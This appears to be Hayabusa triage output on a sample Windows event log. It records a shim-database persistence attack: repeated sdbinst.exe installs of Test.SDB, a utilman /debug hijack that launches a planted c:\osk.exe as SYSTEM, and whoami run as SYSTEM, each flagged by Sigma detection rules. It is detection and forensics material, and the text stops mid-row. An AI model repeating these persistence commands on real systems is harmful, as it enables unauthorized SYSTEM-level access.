C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : 